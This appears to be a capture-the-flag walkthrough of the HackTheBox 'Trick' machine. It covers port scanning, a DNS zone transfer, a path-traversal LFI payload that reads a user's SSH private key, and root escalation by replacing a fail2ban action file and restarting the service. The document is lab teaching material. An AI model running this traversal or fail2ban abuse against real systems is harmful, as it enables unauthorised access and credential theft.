HackTheBox - Trick Walkthrough

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 18 Jun 2022
IP: 10.10.11.166

Enumeration

nmap scanning result

# Nmap 7.92 scan initiated Sat Jul  9 05:53:58 2022 as: nmap -sC -sV -oN scan.nmap -vvv 10.10.11.166
Increasing send delay for 10.10.11.166 from 0 to 5 due to 124 out of 413 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 5 to 10 due to 11 out of 28 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 10 to 20 due to 11 out of 15 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 20 to 40 due to 11 out of 15 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 40 to 80 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 80 to 160 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 160 to 320 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 320 to 640 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 640 to 1000 due to 11 out of 12 dropped probes since last increase.
Nmap scan report for 10.10.11.166
Host is up, received echo-reply ttl 63 (0.37s latency).
Scanned at 2022-07-09 05:53:59 UTC for 579s
Not shown: 996 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
|   256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open  smtp    syn-ack ttl 63 Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    syn-ack ttl 63 nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  9 06:03:38 2022 -- 1 IP address (1 host up) scanned in 579.81 seconds

Foothold

Found the subdomains using DNS query

dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.16.27-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 400 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: Sat Jul 09 06:05:43 UTC 2022
;; XFR size: 6 records (messages 1, bytes 231)

Found 2 subdomains

root.trick.htb
preprod-payroll.trick.htb

Open the preprod-payroll.trick.htb in the browser

found the “Employee’s Payroll Management System” admin page.

After some googling i found this! : https://www.exploit-db.com/exploits/50403

Able to find administrator creds using this sql injection.

Tried multiple methods to get user but nothing works.

User Flag

Continued the enumeration, then found other subdomain: preprod-marketing.trick.htb

The LFI was discovered in the application.

Using this payload : http://preprod-marketing.trick.htb/index.php?page=....//....//....//home/michael/.ssh/id rsa

Able to view the michael openssh private key

Save the openssh private key into the file.

key

Change the permission for key file.

1	chmod 600 micheal.key

ssh -i micheal.key michael@10.10.11.166
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Sep  6 20:37:26 2022 from 10.10.14.49
-bash-5.0$ cat user.txt 
11c5d4f9e8f3010b5f347312fffxxxxx
-bash-5.0$

Got User Flag.

Root Flag

User michael has permission to restart the fail2ban service

bash-5.0$ sudo -l 
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart
bash-5.0$

Using this service we can escalate to the root user.

Reference: Abusing Fail2ban misconfiguration to escalate privileges on Linux

‘security’ group user can able to modify /etc/fail2ban/action.d/ folder.

but we cannot able to change existing file content.

bash-5.0$ ls -l /etc/fail2ban/
total 60
drwxrwx--- 2 root security  4096 Sep  6 20:46 action.d
-rw-r--r-- 1 root root      2334 Sep  6 20:45 fail2ban.conf
drwxr-xr-x 2 root root      4096 Sep  6 20:45 fail2ban.d
drwxr-xr-x 3 root root      4096 Sep  6 20:45 filter.d
-rw-r--r-- 1 root root     22908 Sep  6 20:45 jail.conf
drwxr-xr-x 2 root root      4096 Sep  6 20:45 jail.d
-rw-r--r-- 1 root root       645 Sep  6 20:45 paths-arch.conf
-rw-r--r-- 1 root root      2827 Sep  6 20:45 paths-common.conf
-rw-r--r-- 1 root root       573 Sep  6 20:45 paths-debian.conf
-rw-r--r-- 1 root root       738 Sep  6 20:45 paths-opensuse.conf
bash-5.0$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

Copy the existing config /etc/fail2ban/action.d/iptables-multiport.conf

1	cp /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak

As stated in the reference blog, modify the backup configuration.

Then delete the existing config

1	rm /etc/fail2ban/action.d/iptables-multiport.conf

Rename the backup config

1	mv /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf

Restart the fail2ban service.

1
2
3

bash-5.0$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.
bash-5.0$ cd /etc/fail2ban/action.d/

try some invalid passwords in SSH

ssh root@10.10.11.166
root@trick.htb's password: 
Permission denied, please try again.
root@trick.htb's password: 
Permission denied, please try again.
root@trick.htb's password: 
root@trick.htb: Permission denied (publickey,password).

After 3 attempt our payload executed in the machine as root.

bash-5.0# id
uid=1001(michael) gid=1001(michael) euid=0(root) groups=1001(michael),1002(security)
bash-5.0# cd /root/
bash-5.0# cat root.txt
228c38a63500d91464833478d2xxxxxx
bash-5.0#

copy and submit the root flag.